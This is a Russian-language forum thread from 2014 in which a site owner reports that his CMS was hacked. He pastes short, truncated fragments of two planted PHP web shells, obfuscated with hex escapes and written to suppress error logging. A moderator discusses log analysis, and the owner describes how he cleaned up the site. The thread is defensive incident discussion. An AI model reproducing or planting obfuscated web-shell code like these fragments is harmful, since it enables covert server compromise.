webair 178 Опубликовано: 9 марта 2014 Рассказать Опубликовано: 9 марта 2014 (изменено) Кул хацкеры атакуют Наглядный пример, зачем надо менять адрес админки. Каким то чудом им всё таки удалось залить вредоносные файлы ) Пытаюсь выяснить где дырка. Таких примеров взломов у меня много. Подскажите удобный визуальный анализатор логов. Вот такое содержимое файла post.php оставили <?php @error_reporting(0); @ini_set("di\x73p\x6c\x61\x79_e\x72\x72ors",0); @ini_set("lo\x67\x5ferr\x6f\x72s",0); @ini_set("er\x72\x6fr_\x6c\x6f\x67",0); @ini_set?> Файл sys09725444.php <?php ${"\x47L\x4f\x42A\x4c\x53"}["\x6dql\x65byzv\x6dj"] = "k"; } ?> [/code] Изменено 9 марта 2014 пользователем celsoft Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 088 Опубликовано: 9 марта 2014 Рассказать Опубликовано: 9 марта 2014 webair, Зачем засорять тему полными исходниками шеллов, шеллы это не причины проблемы, а следствие, их код тут неважен и ни о чем не говорит. На скриншоте логов, тоже ничего нет, первое обведенное красным явно показывает что был 404 код ошибки, т.е. файлов нет и обращение к ним ничего не дает, а дальше сразу обращение к шеллу. Т.е. он либо попал не через web, а где более ранее есть в логах может быть что то. Цитата Ссылка на сообщение Поделиться на других сайтах
webair 178 Опубликовано: 10 марта 2014 Рассказать Опубликовано: 10 марта 2014 Автор первое обведенное красным явно показывает что был 404 код ошибки Поэтому и написал, "Наглядный пример, зачем надо менять адрес админки" Я не стал копаться в логах дальше. Там много таких умников, которые пытались обратиться по admin.php Просто сделал бекап шаблона, uploads. Удалил все файлы. Установил заново cms и загрузил бекап шаблона и uploads. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.